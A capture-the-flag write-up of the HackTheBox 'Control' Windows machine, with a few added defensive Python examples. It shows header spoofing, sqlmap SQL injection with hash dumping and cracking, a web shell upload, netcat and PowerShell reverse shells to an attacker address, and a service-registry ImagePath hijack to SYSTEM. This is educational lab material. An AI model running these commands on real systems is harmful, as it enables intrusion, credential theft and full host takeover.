Step 1. Reconnaissance & Enumeration

Let's start with a full TCP port scan and reduce the result to a comma-separated list of open ports.

nmap -Pn -n -p- control.htb --min-rate=1000 | tee nmap_full.txt
# The original chain redirected every step back into port_scan.txt, which truncates the file
# before cat reads it; read from the saved scan and write the port list to a separate file instead.
grep "open" nmap_full.txt | tr '/' ' ' | cut -d ' ' -f 1 | sort -n | tr '\n' ',' | sed 's/,$//' > port_scan.txt

The version scan reports the following information.

▶ nmap -Pn -n -sC -sV -p `cat port_scan.txt` 10.10.10.167 -oA version_scan
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp   open  msrpc   Microsoft Windows RPC
3306/tcp  open  mysql?
| fingerprint-strings:
|   Help, RPCCheck, oracle-tns:
|_    Host '10.10.16.14' is not allowed to connect to this MariaDB server
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

WhatWeb reveals that PHP version 7.3.7 is installed. The IIS version is 10.0, which indicates that this is Windows Server 2016 or Windows Server 2019.

whatweb control.htb
http://control.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.167], JQuery, Microsoft-IIS[10.0], PHP[7.3.7], Script[text/javascript], Title[Fidelity], X-Powered-By[PHP/7.3.7]

On visiting the admin page we get the error "Access Denied: Header Missing. Please ensure you go through proxy." Pressing CTRL + U or F12 brings up the source, where a comment mentions work still needing to be done. We therefore retry the request with an X-Forwarded-For header added in Burp Intercept.

This is successful and we gain access to the admin page, containing a list of products we can modify and a search functionality.
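The header check fails because the application believes any X-Forwarded-For value it receives. The following Python is an added example, not code from the writeup or the target site, that contrasts that logic with a version honouring the header only when the TCP peer is a known proxy; the proxy address 192.168.4.1 and the 192.168.4.x admin range are assumptions.

```python
# Added example (not from the writeup or the target site): why trusting
# X-Forwarded-For for access control fails, and a hardened alternative.
# Requests are modelled as WSGI-style environ dicts; all values are constructed.

TRUSTED_PROXIES = {"192.168.4.1"}           # assumption: the site's real reverse proxy
ADMIN_NETWORK = "192.168.4."                # assumption: the "internal" range the check looks for


def client_ip_vulnerable(environ):
    """Mirrors the flawed check: whatever X-Forwarded-For says is believed."""
    xff = environ.get("HTTP_X_FORWARDED_FOR")
    if xff is None:
        return None                         # the app answers "Access Denied: Header Missing"
    return xff.split(",")[0].strip()        # the first hop is fully client-controlled


def client_ip_hardened(environ):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy, and then take
    the address that proxy appended (the last hop), not the client-supplied first one."""
    peer = environ["REMOTE_ADDR"]
    if peer not in TRUSTED_PROXIES:
        return peer                         # direct connection: ignore the header entirely
    hops = [h.strip() for h in environ.get("HTTP_X_FORWARDED_FOR", "").split(",") if h.strip()]
    return hops[-1] if hops else peer


def is_internal(ip):
    return ip is not None and ip.startswith(ADMIN_NETWORK)


# Constructed requests. 10.10.16.14 is the external client, 192.168.4.28 the spoofed value.
SPOOFED = {"REMOTE_ADDR": "10.10.16.14", "HTTP_X_FORWARDED_FOR": "192.168.4.28"}
# The same client reaching the app through the real proxy, which appends the peer it saw.
VIA_PROXY = {"REMOTE_ADDR": "192.168.4.1",
             "HTTP_X_FORWARDED_FOR": "192.168.4.28, 10.10.16.14"}
```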

Browsing the site, we see many files.

With a good list of pages, we find a couple of SQL injection candidates. There is an SQL injection vulnerability in the view_product.php page that can easily be exploited with sqlmap.

sqlmap -H "X-Forwarded-For: 192.168.4.28" -u "http://10.10.10.167/view_product.php" --data "productId=69" --random-agent

Once the injection is confirmed, we can extract the usernames and password hashes with the command below.

sqlmap -H "X-Forwarded-For: 192.168.4.28" -u "http://10.10.10.167/view_product.php" --data "productId=69" --random-agent --passwords

cat /tmp/sqlmapf8920ty96486/sqlmaphashes-vabxtrqq.txt
root:*0A4A5CAD344718DC418035A1F4D292BA603134D8
manager:*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
hector:*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D

sqlmap's built-in cracker recovers the manager hash as l3tm3!n. The other passwords can be cracked with john, hashcat or online crackers like CrackStation.

cut -d '*' -f 2 /tmp/sqlmapf8920ty96486/sqlmaphashes-vabxtrqq.txt > hashes.txt   # hashcat mode 300 expects the bare 40-hex digest, without the user:* prefix
hashcat -m 300 hashes.txt /usr/share/wordlists/rockyou.txt --force

OR

john --format=mysql-sha1 --wordlist=/usr/share/wordlists/rockyou.txt /tmp/sqlmapf8920ty96486/sqlmaphashes-vabxtrqq.txt   # john reads the user:*hash lines as-is

The hector user's password cracks to l33th4x0rhector.

We need some way to get onto the machine. sqlmap also has a feature to upload files, and we will use it to upload a simple PHP web shell to execute commands. For that we need a full path to a directory the database can write to and the web server will serve. Looking at the gobuster scan for a valid URL, we will try the /uploads directory.

▶ gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -t 20 -x php -u http://10.10.10.167
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.167
[+] Threads:        20
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/04/28 17:30:49 Starting gobuster
===============================================================
/ADMIN.php (Status: 200)
/About.php (Status: 200)
/Admin.php (Status: 200)
/Images (Status: 301)
/Index.php (Status: 200)
/about.php (Status: 200)
/admin.php (Status: 200)
/assets (Status: 301)
/cmd.php (Status: 200)
/database.php (Status: 200)
/images (Status: 301)
/index.php (Status: 200)
/uploads (Status: 301)
===============================================================
2020/04/28 17:38:55 Finished
===============================================================

After some messing around, we upload a PHP web shell through sqlmap and then try to access it.

sqlmap -H "X-Forwarded-For: 192.168.4.28" -u "http://10.10.10.167/view_product.php" --data "productId=69" --file-write '/usr/share/wordlists/SecLists/Web-Shells/PHP/obfuscated-phpshell.php' --file-dest 'c:\inetpub\wwwroot\uploads\ps.php'

We send a request to the ps.php file, modified in Burp to carry the X-Forwarded-For header.

POST /uploads/ps.php HTTP/1.1
Host: control.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.4.28

password=lol&cmd=whoami

and we get the command output. Alternatively, we can upload the p0wny shell directly.

Upon checking, we see that hector is in the Remote Management Users group, which allows them to use

p0wny@shell:C:\inetpub\wwwroot\uploads# net user hector
User name                    Hector
Full Name                    Hector
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/1/2019 12:27:50 PM
Password expires             Never
Password changeable          11/1/2019 12:27:50 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   4/28/2020 9:41:02 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users
Global Group memberships     *None
The command completed successfully.

Step 2. User Pivoting

As with the PHP file, we upload nc.exe to the Windows machine and open a reverse connection with the following commands from the PHP shell.

nc -lvp 6677                       # listener on the attacking machine
nc.exe -e cmd 10.10.16.76 6677     # run from the PHP web shell on the target

We get a normal shell. We first need the hostname.

PS C:\Users\Hector\Documents> hostname
hostname
Fidelity

There are two ways to get a shell as hector.

winrm

We can see port 5985 is open, but only accessible from localhost.

C:\inetpub\wwwroot\uploads>netstat -ano
netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       828
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1904
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       456

We need to forward it. We can forward the port over ssh or through a meterpreter session.

ssh -R 5985:127.0.0.1:5985 10.10.16.76   # run on the target; the original had a typo (5895) in the destination port

OR

meterpreter> portfwd add -l 5985 -p 5985 -r 127.0.0.1
evil-winrm -u hector -p l33th4x0rhector -i 127.0.0.1

powershell

Then we spawn another listener and run the following commands (equivalent to a runas) to get a reverse Powershell as Hector:

nc -lvp 6677
$pass = convertto-securestring 'l33th4x0rhector' -asplaintext -force
$cred = new-object system.management.automation.pscredential("fidelity\hector", $pass)
invoke-command -computer fidelity -scriptblock { c:\inetpub\wwwroot\uploads\nc.exe 10.10.16.76 6677 -e powershell.exe } -credential $cred

Upon checking, we have a shell as the Hector user.

Step 3. Privilege Escalation

After checking with privilege escalation scripts like PowerUp.ps1, nothing stands out. The Get-History PowerShell command only shows the commands executed in the current session, and that history is lost when the session ends. As of PowerShell 5.0, introduced with Windows 10, a new feature persists the history in a file:

gc (Get-PSReadlineOption).HistorySavePath
get-content (Get-PSReadlineOption).HistorySavePath

OR

type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

The history file contains two commands:

get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list

Service Registry Enumeration

Manual Registry Check

The user queried the registry. The first command lists the child items of CurrentControlSet and the second shows its ACL. It seems that hector has been looking at registry ACLs and items under CurrentControlSet; maybe the permissions have been changed somewhere. Service properties exist as subkeys and values under the HKLM:\SYSTEM\CurrentControlSet\Services subkey. If we have write permission on it, we can potentially change the binary path of every service. Let's check the permissions of this subkey.

PS C:\Users\Hector\Documents> get-childitem HKLM:\SYSTEM\CurrentControlset | select -expand name
get-childitem HKLM:\SYSTEM\CurrentControlset | select -expand name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software

When checking the ACLs of CurrentControlSet and its child items, we see that Hector has full access on Services:

get-acl HKLM:\SYSTEM\CurrentControlSet\Services | fl
get-acl HKLM:\SYSTEM\CurrentControlSet\Services | format-list
Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : CREATOR OWNER Allow  FullControl
         NT AUTHORITY\Authenticated Users Allow  ReadKey
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         CONTROL\Hector Allow  FullControl
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
Audit  :
Sddl   : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;KR;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KA;;;S-1-5-21-3271572904-80546332-2170161114-1000)(A;CI;KR;;;AC)

We see that Hector has full control. Although we can change the binary path values, this isn't useful unless we are able to start a service that runs as a privileged user. So we are interested in services running as NT AUTHORITY\SYSTEM that are configured with a manual start type and that we also have permission to start.
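The misconfiguration is visible in the SDDL string above: a regular user SID holds KA (full control) next to SYSTEM and Administrators. The following Python is an added example, not part of the writeup, that parses that SDDL and reports every principal with write-capable rights that is not SYSTEM, Administrators or Creator Owner; the SID it flags is the one get-acl listed as CONTROL\Hector.

```python
import re

# Added example (not part of the writeup): parse the SDDL string that get-acl printed for
# HKLM\SYSTEM\CurrentControlSet\Services and report which principals can modify the key.
# SERVICES_SDDL is the string from the page.
SERVICES_SDDL = ("O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;KR;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)"
                 "(A;CI;KA;;;S-1-5-21-3271572904-80546332-2170161114-1000)(A;CI;KR;;;AC)")

# Principals expected to hold full control over service keys on a default install.
EXPECTED_FULL_CONTROL = {"SY", "BA", "CO"}
# SDDL right tokens that let a principal change the key, or its DACL/owner (which amounts to the same).
WRITE_RIGHTS = {"KA", "KW", "GA", "GW", "WD", "WO"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_aces(sddl):
    """Return the DACL's ACEs as dicts: type, flags, set of right tokens, trustee SID."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else ""
    dacl = dacl.split("S:", 1)[0]            # drop a trailing SACL, if present
    aces = []
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")
        if len(fields) < 6:
            continue
        ace_type, flags, rights, _obj, _inh, sid = fields[:6]
        # rights is either a run of two-letter tokens ("KA", "CCDCLCSWRPWPRC") or a hex mask
        tokens = {rights} if rights.startswith("0x") else set(re.findall(r"[A-Z]{2}", rights))
        aces.append({"type": ace_type, "flags": flags, "rights": tokens, "sid": sid})
    return aces


def unexpected_writers(sddl):
    """SIDs granted write-capable rights by an Allow ACE, excluding SYSTEM, Administrators and Creator Owner."""
    return [a["sid"] for a in parse_aces(sddl)
            if a["type"] == "A" and a["rights"] & WRITE_RIGHTS and a["sid"] not in EXPECTED_FULL_CONTROL]
```

Running `unexpected_writers` against every key under Services (for example from a scheduled audit that exports `(Get-Acl $key).Sddl`) surfaces this kind of delegation before it is abused.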

via Accesschk

accesschk64.exe -accepteula -kwsu "Hector" HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services   # -k registry keys, -w write access, -s recurse, -u suppress errors

sc query seclogon   # check the current state of a candidate service

We cannot edit the services with sc config, but we can change their settings using reg add.

# unstable: this shell gets disconnected after some time
reg add HKLM\System\CurrentControlSet\services\wuauserv /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\uploads\nc.exe 10.10.16.76 6677 -e cmd.exe" /f

sc.exe start wuauserv  # to start the service

OR

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\seclogon -Name "ImagePath" -Value "C:\inetpub\wwwroot\uploads\nc.exe -e powershell.exe 10.10.16.76 6677"
powershell -c "Start-Service seclogon"

In the newly caught NT AUTHORITY\SYSTEM shell, execute the command below to get a more stable shell.

cmd /c START /B "" C:\inetpub\wwwroot\uploads\nc.exe -e powershell.exe 10.10.16.76 6688
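The hijack above leaves an obvious trace: a service ImagePath that points into the web root or launches a shell. The following Python is an added example, not from the writeup, that checks exported ImagePath values for executables outside the normal install roots or command lines spawning cmd/powershell; the service entries are constructed samples.

```python
import re

# Added example (not from the writeup): a defender-side check that flags service ImagePath
# values whose executable sits outside the normal install roots or whose command line spawns
# a shell, which is the trace the wuauserv/seclogon hijack above leaves in the registry.
# The service entries below are constructed samples, not read from a live system.
EXPANSIONS = {"%systemroot%": "C:\\Windows", "%windir%": "C:\\Windows"}
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SHELL_SPAWN = re.compile(r"\s-e\s+(cmd|powershell)(\.exe)?\b", re.IGNORECASE)


def executable_of(image_path):
    """Extract the executable from an ImagePath value (quoted, unquoted, or %var%-prefixed)."""
    value = image_path.strip()
    for var, real in EXPANSIONS.items():
        # REG_EXPAND_SZ values are expanded by the service control manager at start time
        value = re.sub(re.escape(var), lambda _m, r=real: r, value, flags=re.IGNORECASE)
    if value.startswith('"'):
        return value[1:value.find('"', 1)]
    m = re.match(r"(.+?\.exe)(?=\s|$)", value, flags=re.IGNORECASE)
    return m.group(1) if m else value.split(" ", 1)[0]


def suspicious_services(services):
    """services: {name: ImagePath}. Returns (name, executable, reason) for entries to review."""
    findings = []
    for name, image_path in services.items():
        exe = executable_of(image_path)
        if not exe.lower().startswith(TRUSTED_ROOTS):
            findings.append((name, exe, "binary outside trusted install roots"))
        elif SHELL_SPAWN.search(image_path):
            findings.append((name, exe, "command line spawns a shell"))
    return findings


# Constructed sample of HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath values.
SAMPLE_SERVICES = {
    "wuauserv": "C:\\inetpub\\wwwroot\\uploads\\nc.exe 10.10.16.76 6677 -e cmd.exe",
    "seclogon": "%SystemRoot%\\system32\\svchost.exe -k netsvcs -p",
    "MyApp": "\"C:\\Program Files\\MyApp\\svc.exe\" --service",
    "Staged": "C:\\Windows\\Temp\\nc.exe -e powershell.exe 10.10.16.76 6677",
}
```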

Thanks for reading my writeup and thank you to hackthebox.eu and the machine creators.
